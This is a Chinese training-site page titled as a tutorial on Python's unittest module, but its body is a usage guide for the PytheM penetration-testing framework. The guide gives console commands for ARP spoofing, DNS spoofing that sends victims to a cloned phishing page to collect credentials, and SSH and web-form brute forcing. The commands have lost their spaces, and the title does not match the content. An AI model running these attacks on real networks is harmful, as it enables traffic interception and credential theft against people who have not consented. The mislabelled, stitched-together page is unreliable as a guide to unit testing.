千锋教育-做有情怀、有良心、有品质的职业教育机构

手机站
千锋教育

千锋学习站 | 随时随地免费学

千锋教育

扫一扫进入千锋手机站

领取全套视频
千锋教育

关注千锋学习站小程序
随时随地免费学习课程

当前位置:首页  >  技术干货  > Python的Unittest单元测试使用详解

Python的Unittest单元测试使用详解

来源:千锋教育
发布人:xqq
时间: 2023-11-06 21:21:54 1699276914

PytheM是一个Python渗透测试框架。它只能在osnGNU/LinuxOS系统上运行。

安装

$sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt

运行

$sudo./pythem

例子

ARP欺骗-HTTP中间人攻击

命令:

pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http

ARP+DNS欺骗-重定向到伪造的页面,收集登录凭证

使用SET等克隆工具克隆你选中的网站,并部署在Apache2上

命令:

pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns

SSH暴破-暴力破解

pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123

Web页面参数暴力破解

首先获取web页面登录时的参数格式id=value

显示重定向页面,如果定向到一个不同的页面则说明猜解正确。

命令

pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root

URL内容爆破

pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.

功能

[PytheM–PenetrationTestingFrameworkv0.3.2]

help:

打印帮助信息。

exit/quit:

退出程序。

set:

设置变量的值,参数:

interface

gateway

target

file

arpmode例子:

pythem>setinterface|openinputtoset

或者

pythem>setinterfacewlan0|don'topeninputtosetvalue

print:

打印变量的值,例子:

pythem>printgateway

scan:

进行tcp/manualport/arp扫描.

(应该在设置完网卡和目标后再调用)例子:

pythem>scan

或者

pythem>scantcp

arpspoof:

开始或结束arpspoofing攻击.(使用rep或req可以设置arp欺骗的模式,rep表示欺骗响应,req表示欺骗请求)

参数

start

stop

例子:

arpspoofstartarpspoofstop

dnsspoof:

开始dnsspoofing攻击.(应该在arp欺骗攻击开始后再调用)例子:

pythem>dnsspoofstartpythem>dnsspoofstop

sniff:

开始嗅探数据包(应该在设置网卡后再调用)例子:

pythem>sniffhttp

或者

pythem>sniff

[+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.

pforensic:

开始分析数据包(应该在设置完网卡和.pcap文件后调用)例子:

pythem>pforensicpforensic>help

brute-force:

开始暴力破解攻击(应该在设置完目标和字典文件路径后调用)参数:

ssh|目标是IP地址ipaddressastargeturl|目标是url(包含http://或https://)webform|目标是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh

geoip:

显示IP地址的大概位置(应该在设置目标(IP地址)后再调用)例子:

pythem>geoip

或者

pythem>geoip8.8.8.8

decodeandencode:

以选择的模式解码和编码字符串,例子:

pythem>decodebase64pythem>encodeascii

cookiedecode:

解码base64url编码的cookie的值,例子:

pythem>cookiedecode

其它在控制台可以执行的命令,比如cd,ls,nano,cat等。

Jarvis–声音控制助手

[*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以语音识

以上内容为大家介绍了Python的Unittest单元测试使用详解,希望对大家有所帮助,如果想要了解更多Python相关知识,请关注IT培训机构:千锋教育。http://www.mobiletrain.org/

tags: python培训
声明:本站稿件版权均属千锋教育所有,未经许可不得擅自转载。
10年以上业内强师集结,手把手带你蜕变精英
请您保持通讯畅通,专属学习老师24小时内将与您1V1沟通
免费领取
今日已有369人领取成功
刘同学 138****2860 刚刚成功领取
王同学 131****2015 刚刚成功领取
张同学 133****4652 刚刚成功领取
李同学 135****8607 刚刚成功领取
杨同学 132****5667 刚刚成功领取
岳同学 134****6652 刚刚成功领取
梁同学 157****2950 刚刚成功领取
刘同学 189****1015 刚刚成功领取
张同学 155****4678 刚刚成功领取
邹同学 139****2907 刚刚成功领取
董同学 138****2867 刚刚成功领取
周同学 136****3602 刚刚成功领取
相关推荐HOT